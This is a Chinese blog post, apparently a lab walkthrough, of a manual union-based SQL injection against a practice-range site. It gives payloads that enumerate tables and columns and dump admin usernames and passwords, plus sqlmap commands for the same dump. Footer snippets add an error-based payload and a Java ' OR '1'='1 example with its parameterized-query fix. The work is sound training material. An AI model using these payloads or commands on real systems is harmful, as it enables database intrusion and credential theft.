SQL注入案例

已于 2023-09-19 16:20:11 修改
阅读量1.3k 收藏 7
点赞数 3
分类专栏: Web漏洞相关 文章标签: sql 数据库 安全
于 2023-09-07 16:20:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59081708/article/details/132739673
版权

目录

一、简介

二、案例

1.发现注入点

2.寻找注入类型

3.寻找字段数

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

7.寻找表中列

8.查看表中数据

附:SQLMap注入

1.输入指令查数据库

2.输入指令查表

3.脱库查看账号密码

一、简介

记录SQL注入的案例练习

二、案例

http://pu2lh35s.ia.aqlab.cn/

1.发现注入点

2.寻找注入类型

,发现?id=1 and 1=1 符合

3.寻找字段数

发现字段数为2

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

?id=111111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

7.寻找表中列

?id=111111 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'--+

8.查看表中数据

?id=111111 union select 1,group_concat(username,‘:’,password) from admin--+

注:用 --+ 对结尾进行注释

附:SQLMap注入(sqlmap -u "x")

1.输入指令查数据库( --dbs)

2.输入指令查表( -D xx --tables)

3.脱库查看账号密码( -D xx -T xxx -C xxxx --dump)

注:默认全yes,可以添加 --batch 指令实现全自动yes

代码熬夜敲Q
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
〖Python 数据库开发实战 - Python与MySQL交互篇②〗- SQL 注入攻击案例
易编橙 · 终身成长社群,相遇已是上上签!
08-22 4万+
上一章节,我们只是简单的了解了 MySQL Connector 的语法,完成了一个简单的案例。Python 语言操作数据库不是到这里就结束了后续还有很多高级的内容等着我们去学习,该章节我们就来学习一下对所有数据库都有效的 "SQL 注入攻击" 。
SQL手工注入练习:辛巴猫舍 + Sqlmap秒杀
m0_64382069的博客
11-24 538
SQL手工注入练习:辛巴猫舍 + Sqlmap秒杀:登录靶场、判断是否存在SQL注入漏洞、判断数据库字段数、判断回显点、查询相关内容、查询表、查询字段名、查询字段内容、
封神台在线靶场--尤里的复仇Ⅰ 小芳!【8题】
feiniaotjx的博客
10-20 9170
靶场练习 封神台-掌控安全在线演练靶场 第一章:为了女神小芳!
【封神台】SQL注入靶场练习(sqlmap)
00勇士王子的博客
11-01 1万+
靶场地址 https://hack.zkaq.cn 题目 解题过程 1.进入题目 2.只有个 点击查看新闻,点击进入 3.发现参数id,肯定就是我们要注入的参数了,先用sqlmap跑一遍 查询数据库 python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dbs 因为我们需要获得管理员密码,所以要查maoshe数据库 python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --tabl
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL注入案例演示与防范措施大全
乱世刀疤
02-26 1万+
SQL注入攻击案例与应对措施。
SQL注入案例及原理
QYbkx974的博客
11-06 593
updatexml(1,concat(0x5e,(select username from cms_users limit 0,1),0x5e),1)//查询username表中第一个用户名。使用bp抓包查看,可以发现登录包为POST请求,而且可以看到我们刚刚输入的用户名和密码,以及请求回显为200。使用bp抓包查看,POST请求包中输入的用户名所包含的特殊字符变成了URL编码,%27为。查询cms_users表的信息,发现有两个用户,这里显示的是第一个用户。所获取的是数字类型,不是字符串类型。
SQL注入案例实验
千寻的博客
02-21 1218
文章目录前言第一章 目标第二章联合查询第一节必要条件第二节 判断字段个数第四步 判断显示位置第五步 数据库版本 当前数据库名第六步 数据库中的表第七步 表中字段第八步 字段内容第二章 报错注入第一节 group by 重复键冲突第二节XPATH 报错第三章 布尔盲注第一节 原理第二节数据库名长度第三节数据库名第四章 延时注入第一节 原理第二节获取数据库名长度第三节 数据库名免责声明 前言 搭建...
sql各种注入案例
m0_69435261的博客
09-01 4862
GTID_SUBSET( set1 , set2 ) - 若在 set1 中的 GTID,也在 set2 中,返回 true,否则返回 false ( set1 是 set2 的子集)GTID_SUBTRACT( set1 , set2 ) - 返回在 set1 中,不在 set2 中的 GTID 集合 ( set1 与 set2 的差集)GTID_SUBSET() 和 GTID_SUBTRACT() 函数,我们知道他的输入值是 GTIDset ,当输入有误时,就会报错。GTID_SUBSET函数。
ASP+AXCCESS的SQL注入案例
10-28
在本案例中,我们关注的是ASP与Access数据库结合时出现的SQL注入问题。SQL注入是网络安全领域的一个常见漏洞,攻击者通过输入恶意的SQL语句来获取、修改、删除或者控制数据库中的数据。 SQL注入通常发生在网站没有...
sql注入网站源码
04-09
SQL注入是一种常见的网络安全漏洞,主要出现在使用动态SQL语句构建数据库查询的应用程序中。这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这...
SQL注入绕过实战案例
08-31
本文将深入探讨SQL注入的概念、工作原理,并通过"SQL注入实战案例"来阐述如何进行有效防御和绕过。我们将基于sqli-labs-master靶场进行学习,这是一个专门用于SQL注入攻防演练的平台。 SQL注入SQL Injection)是...
[ 代码审计篇资源 ] SQL 注入案例源码
12-25
[ 代码审计篇资源 ] eclipse_64绿色版免安装 [ 代码审计篇 ] 代码审计案例详解中讲到的知识点最好还是自己搭建环境实践一下。...详情可以看我的文章:[ 代码审计篇 ] 代码审计案例详解(一) SQL注入代码审计案例
SQL注入手动盲注案例
05-30
SQL注入手动盲注案例
LeetCode //SQL - 196. Delete Duplicate Emails
Made in Code
07-03 916
【代码】LeetCode //SQL - 196. Delete Duplicate Emails。
postgresql日志的配置
weixin_44847119的博客
07-03 1067
postgresql日志的配置。
My sql 安装,环境搭建
最新发布
2201_75643669的博客
07-03 531
以下以MySQL 8.0.36为例。
解决数据库PGSQL,在Mybatis中创建临时表报错TODO IDENTIFIER,连接池用的Druid。更换最新版本Druid仍然报错解决
番茄Salad
07-02 197
然后我找到了Druid的配置,把全部配置都注释掉,居然可以成功的执行了。然后我一个一个配置排查发现,有个filters的配置,引起的报错,只要把这个注释了,就能成功执行,不管切换什么版本的Druid。我在navicat中尝试了一下执行相同的sql创建临时表语句,确实是能执行的。然后我又进行了一次测试,在xml中的sql创建临时表语句把TEMPORARY删除,直接创建一张物理表,确实成功的执行了。在网上搜索了一下,说把Druid版本升级到最新,我试着升级到了最新,确实不报这个错误了,又报了一个新的错误。
java sql注入案例
06-13
Java SQL注入是一种常见的安全漏洞,攻击者可以通过构造恶意的SQL语句,获取或修改数据库中的数据。下面是一个简单的Java SQL注入案例: 假设有一个使用JDBC连接数据库的Java程序,其中一个查询用户信息的方法如下: ``` public User getUser(String username, String password) throws SQLException { String sql = "SELECT * FROM users WHERE username='" + username + "' AND password='" + password + "'"; Connection conn = DriverManager.getConnection(url, user, passwd); PreparedStatement pstmt = conn.prepareStatement(sql); ResultSet rs = pstmt.executeQuery(); if (rs.next()) { User user = new User(); user.setUsername(rs.getString("username")); user.setPassword(rs.getString("password")); user.setEmail(rs.getString("email")); return user; } else { return null; } } ``` 这个方法接收一个用户名和密码参数,从数据库中查询对应的用户信息。但是,如果攻击者将恶意的SQL语句传递给该方法,就可以造成SQL注入攻击。例如,如果攻击者将用户名参数设置为: ``` john' OR '1'='1 ``` 则构成的SQL语句为: ``` SELECT * FROM users WHERE username='john' OR '1'='1' AND password='xxxxx' ``` 这个SQL语句会返回所有用户的信息,因为'1'='1'永远为真。攻击者可以通过这种方式获取到所有用户的信息,甚至可以修改数据库中的数据。 为了防止SQL注入攻击,应该使用参数化查询,将用户输入的参数作为参数传递给SQL语句。修改上面的代码如下: ``` public User getUser(String username, String password) throws SQLException { String sql = "SELECT * FROM users WHERE username=? AND password=?"; Connection conn = DriverManager.getConnection(url, user, passwd); PreparedStatement pstmt = conn.prepareStatement(sql); pstmt.setString(1, username); pstmt.setString(2, password); ResultSet rs = pstmt.executeQuery(); if (rs.next()) { User user = new User(); user.setUsername(rs.getString("username")); user.setPassword(rs.getString("password")); user.setEmail(rs.getString("email")); return user; } else { return null; } } ``` 使用参数化查询后,即使攻击者传递恶意的用户名和密码,也不会造成SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

代码熬夜敲Q

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值